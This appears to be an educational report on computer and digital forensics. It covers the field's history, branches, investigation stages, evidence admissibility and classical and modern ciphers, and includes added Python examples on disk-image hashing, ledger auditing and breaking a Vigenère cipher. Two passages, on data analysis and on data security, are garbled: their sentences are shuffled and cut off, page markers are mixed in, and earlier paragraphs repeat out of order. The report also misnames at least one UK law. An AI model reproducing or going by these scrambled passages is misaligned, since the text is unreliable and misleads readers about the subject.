INTRODUCTION


Far more information is retained on a computer than most people realize. It is also more difficult to completely remove information than is generally thought. For these reasons (and many more), computer forensics can often find evidence of, or even completely recover, lost or deleted information, even if it was intentionally deleted. The main motto of computer forensic experts is not only to find the criminal but also to find the evidence and present it in a manner that leads to legal action against the culprit. Data lost intentionally or accidentally can be recovered with the help of data recovery experts; computer forensics is the discipline in which the cause of the data loss is identified. There are many definitions of computer forensics; generally, computer forensics refers to the detailed investigation of computers to carry out the required tasks. It investigates the data maintained on the computer to find out what exactly happened to the computer and who is responsible for it. The investigation process starts from the analysis of the ground situation and moves on to the insides of the computer's operating system. Computer forensics is a broader concept which is mainly related to crimes committed on computers that are against the law. Various laws have been imposed to check such crimes, but they still exist and it is difficult to find the criminal due to lack of evidence. All these difficulties can be overcome with the help of computer forensics.

HISTORY OF COMPUTER FORENSICS
Prior to the 1980s crimes involving computers were dealt with using existing laws. The first computer crimes were recognized in the 1978 Florida Computer Crimes Act, which included legislation against the unauthorized modification or deletion of data on a computer system. Over the next few years the range of computer crimes being committed increased, and laws were passed to deal with issues of copyright, privacy/harassment (e.g., cyber bullying, cyber stalking, and online predators) and child pornography. It was not until the 1980s that federal laws began to incorporate computer crime. Canada was the first country to pass legislation in 1983. This was followed by the US Federal Computer Fraud and Abuse Act in 1986, Australian amendments to their crimes acts in 1989 and the British Computer Abuse Act in 1990.

More recently, concern over cyber warfare and cyber terrorism has become an important issue. A February 2010 report by the U.S. Joint Forces Command concluded: "Through cyberspace, enemies will target industry, academia, government, as well as the military in the air, land, maritime, and space domains. In much the same way that airpower transformed the battlefield of World War II, cyberspace has fractured the physical barriers that shield a nation from attacks on its commerce and communication."

In response to the growth in computer crime during the 1980s and 1990s, law enforcement agencies began to establish specialized investigative groups, usually at the national level. Throughout the 1990s there was high demand for these resources, leading to the creation of regional and even local units. During this period the science of digital forensics grew out of ad hoc tools and techniques developed by practitioners. This is in contrast to other forensic disciplines, which developed from work by the scientific community. The rapid development of the discipline resulted in a lack of standardization and training. In his 1995 book, "High-Technology Crime: Investigating Cases Involving Computers", K. Rosenblatt writes: "Seizing, preserving, and analyzing evidence stored on a computer is the greatest forensic challenge facing law enforcement in the 1990s. Although most forensic tests, such as fingerprinting and DNA testing, are performed by specially trained experts the task of collecting and analyzing computer evidence is often assigned to patrol officers and detectives." In 2002, the Scientific Working Group on Digital Evidence (SWGDE) published its "Best practices for Computer Forensics" in response to this need. A subsequent 2005 ISO standard (ISO 17025, General requirements for the competence of testing and calibration laboratories) was published and commercial companies began to offer certification and training programs.

INTRODUCTION TO DIGITAL FORENSICS

Digital forensics (sometimes digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. The term was originally used as a synonym for computer forensics but has expanded to cover other devices capable of storing digital data. The discipline evolved in a haphazard manner during the 1990s and it was not until the early 2000s that national policies were created.

Investigations often take one of three forms: forensic analysis (where evidence is recovered to support or oppose a hypothesis before a criminal court), eDiscovery (a form of discovery related to civil litigation) or intrusion investigation (which is a specialist investigation into the nature and extent of an unauthorized network intrusion). Investigations are much broader in scope than other areas of forensic analysis (where the usual aim is to provide answers to a series of simpler questions), often involving complex time-lines or hypotheses. As well as identifying direct evidence of a crime, digital forensics can be used to attribute evidence to specific suspects, confirm alibis or statements, determine intent, identify sources (for example, in copyright cases) or authenticate documents.

Branches: Digital forensics includes several sub-branches relating to the investigation of various types of devices, media or artifacts. The science of digital forensics is divided into several sub-branches: computer forensics, network forensics, database forensics and mobile device forensics.

Computer forensics
The goal of computer forensics is to explain the current state of a digital artifact, such as a computer system, storage medium or electronic document. The discipline usually covers computers, embedded systems (digital devices with rudimentary computing power and onboard memory) and static memory (such as USB pen drives).

Computer forensics can deal with a broad range of information, from logs (such as internet history) through to the actual files on the drive. In 2007 prosecutors used a spreadsheet recovered from the computer of Joseph E. Duncan III to show premeditation and secure the death penalty. Sharon Lopatka's killer was identified in 2006 after email messages from him detailing torture and death fantasies were found on her computer.

Mobile device forensics
Figure: Mobile phones in a UK evidence bag
Mobile device forensics is a sub-branch of digital forensics relating to recovery of digital evidence or data from a mobile device. It differs from computer forensics in that a mobile device will have an inbuilt communication system (e.g. GSM) and, usually, proprietary storage mechanisms. Investigations usually focus on simple data such as call data and communications (SMS/Email) rather than in-depth recovery of deleted data. SMS data from a mobile device investigation helped to exonerate Patrick Lumumba in the murder of Meredith Kercher. Mobile devices are also useful for providing location information, either from inbuilt GPS/location tracking or via cell site logs (which track the devices within their range). Such information was used to track down the kidnappers of Thomas Onofri in 2006.

Network forensics
Network forensics relates to the monitoring and analysis of computer network (both local network and WAN/internet) traffic for the purposes of information gathering, legal evidence or intrusion detection. Traffic is intercepted (usually at the packet level) and either stored for later analysis with specialist tools or filtered in real time for relevant information. Unlike other areas of digital forensics, network data is often volatile and seldom logged, making the discipline often reactionary. In 2000 the FBI lured computer hackers Aleksey Ivanov and Gorshkov to the United States for a fake job interview. By monitoring network traffic from the pair's computers they managed to identify passwords which let them collect evidence directly from computers back in Russia.

Database forensics
Database forensics is a branch of digital forensics relating to the forensic study of databases and their metadata. Investigations use database contents, log files and in-RAM data in order to build a time-line or recover relevant information.

COMPUTER FORENSICS

Computer forensics (sometimes computer forensic science) is a branch of digital forensic science pertaining to legal evidence found in computers and digital storage media. The goal of computer forensics is to explain the current state of a digital artifact, such as a computer system, a storage medium (e.g. hard disk or CD-ROM), or an electronic document (e.g. an email message or JPEG image). The scope of a forensic analysis can vary from simple information retrieval to reconstructing a series of events. Computer evidence can be useful in criminal cases, civil disputes, and human resources/employment proceedings.

Basics of Computer Forensics:
Computer forensics is the art of finding evidence which is valid in legal terms. Computer forensics is the collection, preservation, analysis, and presentation of computer-related evidence. Computer forensics facilitates the organized and careful detection of computer-related crime and abuse cases. The computer forensics expert should have a great deal of knowledge of data recovery software as well as the hardware, and should possess the qualification and knowledge required to carry out the task. Also there are standards that need to be followed to acquire the evidence. The main motto of computer forensic experts is not only to find the criminal but also to find the evidence and present it in a manner that leads to legal action against the culprit. Computer crime is increasing at an alarming rate and the procedures that are required for curbing the crime are not sufficient to have a counter effect. Hence new laws are being introduced to deal with computer crime and related issues. The major reasons for criminal activity in computers are:
- Unauthorized use of computers, mainly stealing a username and password
- Accessing the victim's computer via the internet
- Releasing a malicious computer program, that is, a virus
- Harassment and stalking in cyberspace
- E-mail fraud
- Theft of company documents

The basic things that are required of a computer forensics professional include a proper understanding of the computer hardware and software, a thorough knowledge of the computer operating system as well as the file system, and an understanding of the ethics and legalities. Computer forensics experts must identify the suspects and the sources from which the evidence can be collected. They are also required to preserve the digital evidence and extract sufficient information from it that can be produced before a court of law. The detailed things that need to be performed include acquisition of the electronic evidence as well as securing the data and relevant information, including the machine.

The first thing the computer forensics professional must do when a case is handed over to him or his team is a detailed case study. Crime scene investigation is also an important task which should have priority; it is the crime scene investigation on which further investigation is based. Examination of the surroundings of the machine and documentation of the same should be done. The next thing that needs attention is to document the hardware involved. It is desirable that the documentation be carried out in the presence of a senior official. The next thing is to record the open applications. A proper investigation for traps should be carried out so that no unintentional action causes the deletion of data or information that could prove vital in further proceedings. Hence the machine should be powered down carefully. When the machine is acquired, it is moved out of the crime scene to a secluded place where the evidence cannot be tampered with. When the machine is acquired, the following tasks need to be performed. The best thing in any type of investigation process is to completely copy the storage media device, so that any further investigation of the media does not damage the original. The next thing is the analysis of the evidence. Scanning of the emails is also an important task; there may reside a large quantity of email or data in the computer that needs to be scanned. It is advisable for the computer forensics professional to carry out the investigation starting from the visible and easily observable data and then proceed further into the depths of the operating system files. A thorough analysis of the evidence is needed before the case can be presented before the court. The findings should then be documented properly and all the information, in the form of evidence, should be presented before the authority concerned.

Data Security
Computer forensics and the security of data are related. Computer forensics can be applied even in lieu of, or for the purpose of, data security. Data security can be broadly classified into two aspects: one is data corruption or data damage, and the other is damage or theft of information due to human interaction. In both cases the services of the computer forensics expert can be availed. Data security may be required for individual single systems as well as for systems that are connected over a network. Computer forensics experts are required to have a great deal of knowledge regarding system administration as well. It is also the duty of the system administrator to support and maintain the software tools so that an intrusion can be detected at the earliest. The subject of computer forensics also requires knowledge of data recovery processes. The term forensics has its meaning in the primary dealing with the recovery and analysis of possible evidence. An analogy that can be drawn is with the fingerprints that may have been left on a window or something else that can be recorded as evidence, or with the DNA evidence that is recovered from blood stains or samples. The same is the case in computer forensics. The difference is that files on storage media like hard disk drives, floppy disks, tape drives and optical disks should be recovered and proper evidence should be made from that information. The evidence in computer forensics may take many forms. The evidence in the case of computer crimes is the data or information that can be effectively used in a legal prosecution that may lead to the punishment of the culprit. No piece of important information should be neglected.

Also important is the legality of the process. The legislation in various countries gives good support to the services of computer forensics, and there are many laws that provide support to computer forensics. Although many steps have been taken and the government is providing the support required by forming new laws and legislation, since computer forensics is a new subject discipline there exists little standardization and consistency across courts of law and industries.

Data security is important in any corporate organization. Information systems or network systems are easily prone to damage if the appropriate measures are not taken at the beginning. Data security is important in cases where the information is considered sensitive or secret to the functioning of the organization. The secrecy or privacy of the organization is important in some cases where it is maintained as per expectations. In some cases it is possible that the storage media is damaged physically or the data storage device is moved. In some cases it is also possible that there are disasters and natural calamities like earthquakes, volcanoes, hurricanes, fire, etc. In such cases the computer forensics expert is required to run the data recovery process to recover the data. If there is theft of the storage device itself then the task is much more tedious. The task of the computer forensic expert becomes severe if the tracks are erased. Data recovery in itself is a large topic. Forensic data recovery (FDR) is also a part of computer forensics.

Computer Forensic Service
There are many different areas of computing in which the services of computer forensics are employed. Most computer forensics services provide useful services to an organization. They are very useful in a professional environment where the requirement is quite high. The computer forensics services are availed most in cases of sabotage and mishandling of data or information. The services of computer forensics are availed in private as well as government organizations. Some of the important fields in which the services of computer forensics can be applied include the following. Computer forensics is extensively used in criminal as well as civil litigation, and can be used to support criminal and civil warrants. Computer forensics services also include investigative assistance. Incident response and internal investigations can be done using computer forensics; incident response systems also play a part in computer forensics, and sometimes are referred to as a part of computer forensics. Security risk management can also be carried out using computer forensic tools. Another aspect of computer forensics is electronic document discovery, and computer forensics is useful in electronic discovery requests. The services provided by computer forensics include the development of plans to gather electronic evidence. Computer forensics is also important in corporate consulting. In the case of corporate consultations the services provided by the computer forensics professional include the development of in-house standards. Electronic file retention policies are also a part of the consultancy services of computer forensics. Consultation can be provided to adhere to the legislation involving federal and provincial privacy; intentional misuse of privacy or personal information can be considered as a legal case with the help of computer forensics. In the event of conducting audits its services can also be availed; these audits may involve remote or even network analysis. The compliance of proactive reviews as well as risk assessment, and even the investigation of specific allegations, can make use of the services of computer forensics. The protection of corporate assets is also a service of computer forensics, and the protection of intellectual property is a major service. The services of computer forensics can also be used for data recovery problems. The services are also available for dispute resolution and to provide expert witness testimony. Computer forensics investigation is also beneficial for the purpose of identification, preservation, acquisition, analysis and reporting of digital evidence. The digital evidence may come from desktop computers, laptops, storage servers, or any type of removable storage device. Apart from all these services, computer forensics can even be applied to individual case studies involving personal issues.

COMPUTER FORENSICS PROCESS

A digital forensic investigation commonly consists of 3 stages: acquisition or imaging of exhibits, analysis, and reporting. The first stage, acquisition, involves creating an exact sector-level duplicate (or "forensic duplicate") of the media, often using a write-blocking device to prevent modification. Both the acquired image and the original media are hashed (using SHA-1 or MD5). This is work that can often be performed by less specialist staff.

During the analysis phase an investigator usually recovers evidence material using a number of different methodologies (and tools). In 2002 the International Journal of Digital Evidence referred to this stage as "an in-depth systematic search of evidence related to the suspected crime". In 2006, forensics researcher Brian Carrier described a more "intuitive procedure" in which obvious evidence is first identified, after which "exhaustive searches are conducted to start filling in the holes". Once evidence is recovered the information is analyzed to reconstruct events or actions and to reach conclusions. When an investigation is complete the investigator presents his data, usually in the form of a written report, in lay person's terms. Field experience is always different from the theoretical procedures; more or less, the procedures that are required or that can be followed depend upon the situation that is encountered.

Evidence Tracking
The main function of any computer forensics professional is to track the evidence that can be legally produced before a court of law. Evidence tracking can be based on examining and observing the physical locations as well as on thorough examination of data or information. The evidence tracking mechanisms usually start with observation of the physical locations during the crime scene investigation. The physical location under discussion is the address where the crime has been committed: where the computer system is located and how the computer system can be accessed. The term physical location may also be used in discussion where it relates to a physical memory location.

Some of the places that need the attention of the computer forensics team include the following. The first step is to carefully observe and examine the location near the computer system. Those places where the evidence can be easily collected should also be examined. The first among them is the computer system itself. Information like whether it is a single system or a networked PC also matters. The network connections and the number of systems that are connected to them also matter in the investigation. The server, if any is present in the network, and its relation with the victim computer system should be studied and analyzed. Next in line is the phone set. Components like fax machines, modems, and all other peripherals that may have some link with the computer should be analyzed. Even external sources should be examined in great detail. The keyboard, mouse, etc. or any other peripherals can be subjected to DNA fingerprinting.

Next, the main part of the analysis starts with the study of the internals of the computer system, mainly the software like the operating system and the log files associated with it. Moreover the hard disk drive as the secondary memory device and the operating system files are studied in detail. To save time, the computer forensics expert needs to visualize himself in the footsteps of a criminal who might have committed the crime. Usually some sort of tool kit is used for the analysis of evidence. Some examples of files that can be effectively used as evidence include the following. There exist many files used by the operating system that can provide vital evidence for the forensics expert. The major evidence can be collected from the log files that are generated each time an event occurs due to an action from the user. Next in line are the temp (temporary) files and the cookies. The cache can also prove to be important evidence. The importance of the slack space and the swap files is also not ruled out. These files may sometimes store encrypted information that should be decrypted. Efforts should be made to analyze and collect the evidence from the undeleted files. If such files are deleted then the deleted data recovery process should be initiated for the recovery of such files.
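The acquisition stage described above (sector-level duplicate, then hashing both the original media and the image) is shown here as a small added example; it is not code from the original document. The "drive" is a constructed in-memory byte string standing in for a write-blocked device, the exhibit label is a placeholder, and SHA-256 is included alongside the MD5 and SHA-1 the text names because the older two are no longer collision resistant. Comparing the digests of the original and the image is what verifies that the copy is exact, and recording them at each stage is what the chain of custody rests on.

```python
import hashlib
import io

SECTOR_SIZE = 512

# Constructed stand-in for a seized drive (not a real image): three full sectors plus a
# short trailing fragment, so the imaging loop also has to cope with a partial last read.
CONSTRUCTED_MEDIA = (
    b"BOOT SECTOR".ljust(SECTOR_SIZE, b"\x00")
    + b"report.docx: quarterly figures".ljust(SECTOR_SIZE, b"\x00")
    + b"unallocated: remnants of a deleted file".ljust(SECTOR_SIZE, b"\x00")
    + b"slack"
)


def image_media(device, sector_size=SECTOR_SIZE):
    """Sector-level duplicate: read the (write-blocked) device block by block, copying every byte."""
    device.seek(0)
    image = bytearray()
    while True:
        sector = device.read(sector_size)
        if not sector:           # end of device; a short final read is still copied in full
            break
        image.extend(sector)
    return bytes(image)


def hash_digests(data):
    """MD5 and SHA-1 as the text names; SHA-256 added because the older two are no longer collision resistant."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def verify_image(original, image):
    """Accept the duplicate only if every digest of original and image agrees."""
    return hash_digests(original) == hash_digests(image)


def custody_entry(exhibit_id, stage, data):
    """One chain-of-custody record: the stage plus the digests that pin the content at that point."""
    return {"exhibit": exhibit_id, "stage": stage, "size": len(data), **hash_digests(data)}


def acquire(exhibit_id, device):
    """Image the device, hash original and image, and return (image, custody records, verified)."""
    device.seek(0)
    original = device.read()     # for a real device the original is hashed by streaming it, as image_media reads it
    image = image_media(device)
    chain = [
        custody_entry(exhibit_id, "original media", original),
        custody_entry(exhibit_id, "forensic duplicate", image),
    ]
    return image, chain, verify_image(original, image)


def run_constructed_case():
    """Acquire the constructed media, then re-check a copy in which one byte was changed afterwards."""
    image, chain, verified = acquire("EXHIBIT-01 (placeholder id)", io.BytesIO(CONSTRUCTED_MEDIA))
    tampered = image[:600] + b"\xff" + image[601:]   # a single altered byte inside sector 2
    return {
        "verified": verified,
        "size": len(image),
        "digests_match": chain[0]["sha256"] == chain[1]["sha256"],
        "tampered_detected": not verify_image(CONSTRUCTED_MEDIA, tampered),
    }


if __name__ == "__main__":
    for key, value in run_constructed_case().items():
        print(f"{key}: {value}")
```

Any later re-hash of the image that disagrees with the custody record means the exhibit can no longer be shown to be what was seized, which is exactly the trustworthiness question the Digital evidence section below raises.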

Digital evidence
Digital evidence can come in a number of forms. Where it will be used in a court of law, digital evidence falls under the same legal guidelines as other forms of evidence; courts do not usually require more stringent guidelines. In the United States the Federal Rules of Evidence are used to evaluate the admissibility of digital evidence, the United Kingdom PACE and Civil Evidence acts have similar guidelines, and many other countries have their own laws. US Federal Rules of Evidence state that a qualified expert may testify "in the form of an opinion or otherwise" so long as: "(1) the testimony is based upon sufficient facts or data, (2) the testimony is the product of reliable principles and methods, and (3) the witness has applied the principles and methods reliably to the facts of the case."

Attorneys have argued that because digital evidence can theoretically be altered it undermines the reliability of the evidence. US judges are beginning to reject this theory; in the case US v. Bonallo the court ruled that "the fact that it is possible to alter data contained in a computer is plainly insufficient to establish untrustworthiness". The ease with which digital media can be modified means that documenting the chain of custody from the crime scene, through analysis and, ultimately, to the court, is important to establish the authenticity of evidence. Digital investigators, particularly in criminal investigations, have to ensure that conclusions are based upon factual evidence and their own expert knowledge.

Or. in the UK forensic examination of computers in criminal matters is subject to ACPO guidelines. The data analysis software is even capable to perform extractions of the data. Specific calculations can also be performed. mobile phones are often acquired inside a Faraday shield to stop radio traffic to the device. Statistical Analysis of data can also be carried out. The analysis should be done in order to identify the information over the systems that have some potential information. The accuracy of the organizations data need to be studied. The first step in data analysis is called as scoping where in the auditor can determine the objectives and is capable of identifying the organizational systems. For example. The Page | 20 . Data analysis is a process which contains many steps in order to carry out a proper investigation. The functions that can be carried out by an auditor using the data analysis software include the following: The data analysis software is used for passing the queries of the data. The steps in data analysis are discussed below. There are even that can be used to carry out the steps in data analysis for example the Computer Assisted Auditing Tools and Techniques – CAATT.INTRODUCTION Many of the sub-branches of digital forensics have their own specific guidelines for handling and investigating evidence. A professional in computer forensic is required to audit the data to get required evidence. A portable Tableau write-blocker attached to a Hard Drive Data Analysis Analysis of computer data is also an important part in computer forensics. The next important function that can be carried out is the stratification of data. The missing sequences in the data segment can be identified with the help of data analysis software. There is even a data analysis software helps and minimizes the time to carry out the task.

The reporting of this data is carried out in the next step. Even in extreme cases when a file is found and opened by any person then also person should not be able to read to the file. Extracting the key information from the given data that forms the valid evidence is an important task that needs to be carried out. Page | 21 . It includes for example the valuation of credit and debit.INTRODUCTION next step is to request the information from the concerned organization. The reporting can be carried to have discussions with the team members or even higher ups. The file should be decrypted before it can be read. as well as reliable. The next step comprises the procedures to extract the data. It is step to find out whether the information provided by the organization is valid. Is the information provided has any false information regarding the behavior and dealing of organization. The extracted information should be providing relevant evidence. The encrypted file is stored in some location that is not easily identifiable. In short only the information that provides sufficient and relevant part need be considered. work papers as well as the presentations. Next step involves data importation where in the computer forensics professional is required to determine the authenticity of the data and verify the credentials of the information by appropriate investigations. The next in the data analysis procedures include data profiling. Data Encryption The encryption of any information in a computer system is done to maintain the privacy or secrecy of the subject. When all the above steps are carried in complete satisfaction and the information is collected so far. The contents of the file or data after encryption are not in a readable format. all else is just ignored. Documentation can be carried in the research sheets. The information regarding the decryption is available only to the person who is authorized for reading the information. 
But it is also desired for the person who is encrypting the file to again decrypt it. histograms and modeling. The outcome results of the audits must be reported. One of the noticeable things in data analysis is continuous monitoring of information. An overall conclusions of the data that has been collected so far needs to carried out. The information that is requested from the organization should be sufficient. Other techniques that are worth mentioning include comparative analysis or data. relevant. This is done so that there is no leakage of the file.
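The Data Analysis section above lists the functions an auditor gets from CAATT-style software (queries, stratification, missing-sequence detection, calculations, statistics, extraction). The following added example, which is mine and not the document's or any CAATT product's code, implements each of those functions over a constructed ledger export; the invoice numbers, accounts and amounts are made up, with two gaps and one duplicate planted so that the checks have something to find.

```python
from collections import Counter
from statistics import mean, pstdev

# Constructed ledger export (not real data). Invoice numbers are meant to be consecutive:
# 1003 and 1006 are missing and 1008 appears twice, which are exactly the anomalies an
# auditor would want flagged before the records are relied on as evidence.
LEDGER = [
    {"invoice": 1001, "type": "debit",  "amount": 250.00,  "account": "A"},
    {"invoice": 1002, "type": "credit", "amount": 1200.00, "account": "B"},
    {"invoice": 1004, "type": "debit",  "amount": 75.50,   "account": "A"},
    {"invoice": 1005, "type": "debit",  "amount": 9800.00, "account": "C"},
    {"invoice": 1007, "type": "credit", "amount": 430.00,  "account": "B"},
    {"invoice": 1008, "type": "debit",  "amount": 15.25,   "account": "A"},
    {"invoice": 1008, "type": "debit",  "amount": 15.25,   "account": "A"},
]

# Stratification bands: half-open [low, high) ranges on the amount column.
BANDS = [("small", 0, 100), ("medium", 100, 1000), ("large", 1000, float("inf"))]


def query(records, predicate):
    """Pass a query over the data: keep the records for which predicate holds."""
    return [r for r in records if predicate(r)]


def missing_sequence(records, field="invoice"):
    """Identify gaps in what should be a continuous numbering."""
    seen = set(r[field] for r in records)
    return [n for n in range(min(seen), max(seen) + 1) if n not in seen]


def duplicates(records, field="invoice"):
    """Values that occur more than once in a field that should be unique."""
    counts = Counter(r[field] for r in records)
    return sorted(value for value, n in counts.items() if n > 1)


def stratify(records, bands, field="amount"):
    """Count how many records fall into each band."""
    result = {label: 0 for label, _, _ in bands}
    for r in records:
        for label, low, high in bands:
            if low <= r[field] < high:
                result[label] += 1
                break
    return result


def totals_by_type(records):
    """Specific calculation: the credit and debit totals (the 'valuation of credit and debit')."""
    totals = {}
    for r in records:
        totals[r["type"]] = round(totals.get(r["type"], 0.0) + r["amount"], 2)
    return totals


def outliers(records, field="amount", z=1.5):
    """Statistical analysis: records whose amount lies more than z standard deviations from the mean."""
    values = [r[field] for r in records]
    m, sd = mean(values), pstdev(values)
    if sd == 0:
        return []
    return [r for r in records if abs(r[field] - m) / sd > z]


def extract(records, fields):
    """Extraction: keep only the columns that form the evidence, discarding the rest."""
    return [{f: r[f] for f in fields} for r in records]


if __name__ == "__main__":
    print("missing invoices:", missing_sequence(LEDGER))
    print("duplicate invoices:", duplicates(LEDGER))
    print("strata:", stratify(LEDGER, BANDS))
    print("totals:", totals_by_type(LEDGER))
    print("outliers:", extract(outliers(LEDGER), ["invoice", "amount"]))
```

Each function returns its findings rather than printing them, so the same calls can feed the reporting step (work papers, presentations) described above.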

A cipher is the algorithm that is used to encrypt the file. There are many ciphers that are used for encryption of information. Ciphers can be classified as classical ciphers, rotor machines and finally modern ciphers. The classical ciphers are again classified as substitution ciphers and transposition ciphers. Below are some of the classical ciphers used in cryptography. Examples of substitution ciphers include the Caesar cipher, ROT13, polyalphabetic substitution, the Hill cipher and the Vigenère cipher, the autokey cipher, the Playfair cipher by Charles Wheatstone, the affine cipher and the Atbash cipher. Examples of transposition ciphers are the scytale, the grille cipher, the permutation cipher, as well as the VIC cipher. There are also attacks that are carried out against the classical ciphers, for example frequency analysis and the index of coincidence. In the earlier part of the 20th century, encryption of text was done using more sophisticated machines called rotor machines. These machines were more complex than the earlier encryption techniques. The modern ciphers are classified as public key and private key. The private key ciphers are again classified as stream and block ciphers, depending on whether they work on blocks of fixed size (block ciphers) or on a continuous stream of symbols (stream ciphers).

These are the algorithms that are employed for the encryption of information. The encryption methods can be divided into symmetric key algorithms and asymmetric key algorithms. Within symmetric key ciphers there are two different types of encryption used. In both cases the sender and receiver are required to have a shared key. The shared key should be known to both of them in advance. The sender uses this key for encryption, and then the receiver uses the same key for decryption and reading of the information that is passed over. Examples of symmetric key algorithms include DES (Data Encryption Standard) as well as AES (Advanced Encryption Standard). In the case of asymmetric key algorithms, for example RSA, there are usually two separate keys, public and private. The public key is shared, whereas the private key is not shared with others except the two parties. It is required for both parties in the communication to keep the information secret from parties that are not involved in the communication. Computer forensics experts are required to have a great deal of knowledge regarding system administration as well.

fire. The difference is that the files over the storage media like the hard disk drives. Since the computer forensics is a new subject discipline. If there is the theft of the storage device itself then the task is much tedious. The same is the case in the computer forensics. In some cases it is possible that the storage media is damaged physically or the data storage device is moved. volcanoes.INTRODUCTION to have a great deal of knowledge regarding the system administration as well. In some cases it is also possible that there are disasters and natural calamities like the earth quakes. Also the important thing is the legality of the process. The Information Systems or the Network Systems are easily prone to damage if the appropriate measures are not taken at the beginning. In both the cases the services of the computer forensics expert can be availed. floppy disks. In such cases the computer forensics expert is required to Page | 23 . The legislation in various countries has a good support to the services of computer forensics. tape drives and the optical disks should be recovered and proper evidence should be made from that information. The data security is important in case where the information is considered as sensitive or secret to the functioning of the organization. The data security may be required over the individual single systems as well as the systems that are connected over the network. hence there exist little standardization and consistency across the courts of law and industries. The subject of the computer forensics also requires the knowledge of the data recovery processes. It is also the duty of the system administrator to support and maintain the software tools so that can intrusion can be detected at the earliest. or it may be like the DNA evidence that is recovered from blood stains or samples. 
The evidence in case of the computer crimes is the data or the information that can be effectively used in the legal prosecution that may lead to the punishment of the culprit. Although many steps have been taken and the government is providing the support required by forming new laws and legislations. The term forensics has its meaning in the primary dealing of the recovery and analysis of the possible evidence. The data security can be widely classified to have to aspects one in the data corruption or data damage as well as in case of any damage or theft of the information due to human interaction. hurricanes etc. The data security is important in any corporate organization. An analogy that can be drawn in contrast is like the fingerprints that may have been left over a window or something else that can be recorded as the evidence. The evidence in computer forensics may take many forms.
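The cryptography section above names the Vigenère cipher and the two classical attacks on it, the index of coincidence and frequency analysis, without showing how they work. The following is an added worked example, not code from the original report: it implements the cipher, estimates the key length from the index of coincidence of the ciphertext columns, and recovers each key letter by frequency analysis. The English letter-frequency table, the key "HASHING", the 0.055 threshold and the sample plaintext are all assumptions constructed for the illustration.

```python
"""Vigenere cipher, the index of coincidence and frequency analysis.

Added example (not from the original report). The cipher, the attack and
the sample plaintext below are all constructed here for illustration.
"""
from collections import Counter

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Relative frequency (percent) of each letter A..Z in English text.
ENGLISH_FREQ = [8.167, 1.492, 2.782, 4.253, 12.702, 2.228, 2.015, 6.094, 6.966,
                0.153, 0.772, 4.025, 2.406, 6.749, 7.507, 1.929, 0.095, 5.987,
                6.327, 9.056, 2.758, 0.978, 2.360, 0.150, 1.974, 0.074]


def letters_only(text):
    """Classical ciphers work on the 26-letter alphabet: drop everything else."""
    return "".join(c for c in text.upper() if c in ALPHABET)


def vigenere(text, key, decrypt=False):
    """Polyalphabetic substitution: letter i is shifted by key letter i mod len(key)."""
    key = letters_only(key)
    out = []
    for i, c in enumerate(letters_only(text)):
        shift = ALPHABET.index(key[i % len(key)])
        if decrypt:
            shift = -shift
        out.append(ALPHABET[(ALPHABET.index(c) + shift) % 26])
    return "".join(out)


def caesar(text, shift):
    """The Caesar cipher is a Vigenere cipher with a one-letter key."""
    return vigenere(text, ALPHABET[shift % 26])


def index_of_coincidence(text):
    """Probability that two letters drawn from the text are equal.
    English is about 0.066; uniformly random letters give 1/26 = 0.038."""
    n = len(text)
    if n < 2:
        return 0.0
    return sum(f * (f - 1) for f in Counter(text).values()) / (n * (n - 1))


def estimate_key_length(ciphertext, max_len=20, english_like=0.055):
    """Split the ciphertext into columns for each candidate period. At the true
    key length every column is a single Caesar alphabet and keeps English's IoC;
    at a wrong period the columns mix alphabets and the IoC drops towards 0.038."""
    for period in range(1, max_len + 1):
        columns = [ciphertext[i::period] for i in range(period)]
        if sum(index_of_coincidence(c) for c in columns) / period >= english_like:
            return period
    return None


def best_caesar_shift(column):
    """Frequency analysis: the shift whose un-shifted letter counts best match
    English (lowest chi-squared statistic) is the key letter for this column."""
    n = len(column)
    best_shift, best_score = 0, float("inf")
    for shift in range(26):
        counts = Counter(ALPHABET[(ALPHABET.index(c) - shift) % 26] for c in column)
        score = 0.0
        for i, letter in enumerate(ALPHABET):
            expected = n * ENGLISH_FREQ[i] / 100
            score += (counts[letter] - expected) ** 2 / expected
        if score < best_score:
            best_shift, best_score = shift, score
    return best_shift


def break_vigenere(ciphertext):
    """Recover (key, plaintext) with no knowledge of the key."""
    key_len = estimate_key_length(ciphertext)
    if key_len is None:
        raise ValueError("no English-like period found; text too short or not English")
    key = "".join(ALPHABET[best_caesar_shift(ciphertext[i::key_len])] for i in range(key_len))
    return key, vigenere(ciphertext, key, decrypt=True)


# Constructed sample plaintext (an English passage; the attack needs a few hundred letters).
PLAINTEXT = (
    "Far more information is retained on a computer than most people realize and it is "
    "also more difficult to completely remove information than is generally thought. For "
    "these reasons computer forensics can often find evidence of or even completely recover "
    "lost or deleted information even when it was intentionally deleted. The main goal of "
    "the examiner is not only to identify the person responsible but also to collect the "
    "evidence and to present it in a manner that supports legal action. Log files record "
    "the date and time of every activity of the user and a careful study of these records "
    "allows the examiner to reconstruct what happened on the machine and when. Hashing "
    "tools compare the original disk with its copy and if the two values match then the "
    "copy is an exact replica of the original. Disk imaging software records the structure "
    "and the contents of a drive so that the investigator can examine a copy while the "
    "suspect machine remains untouched. Encryption decoding software and password cracking "
    "tools are useful for reaching protected data while memory capture tools preserve the "
    "contents of random access memory before the machine is powered off. The evidence must "
    "be handled with great care so that nothing is altered or destroyed during the course "
    "of the investigation."
)

if __name__ == "__main__":
    ciphertext = vigenere(PLAINTEXT, "HASHING")
    key, recovered = break_vigenere(ciphertext)
    print("recovered key:", key)
    print("plaintext starts:", recovered[:60])
```

The attack succeeds because a substitution alphabet preserves the statistical shape of the language; the same weakness is why the modern ciphers named above (DES, AES, RSA) are designed so that ciphertext statistics carry no information about the key.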

Crime Scene Investigation

The first and the most important part of any forensic investigation is the crime scene investigation (CSI). The basis of further investigation is dependent on the crime scene investigation. Computer forensics has a part known as crime scene investigation, and the crime scene investigation in case of computer crime is similar to the crime scene investigation carried out in other cases like murder, robbery etc. The crime scene investigation professional is a required part of the computer forensics team. There are different positions and categories in computer crime scene investigation, like crime scene analysts, crime scene technicians etc. The investigative professional is usually an officer appointed by the authority.

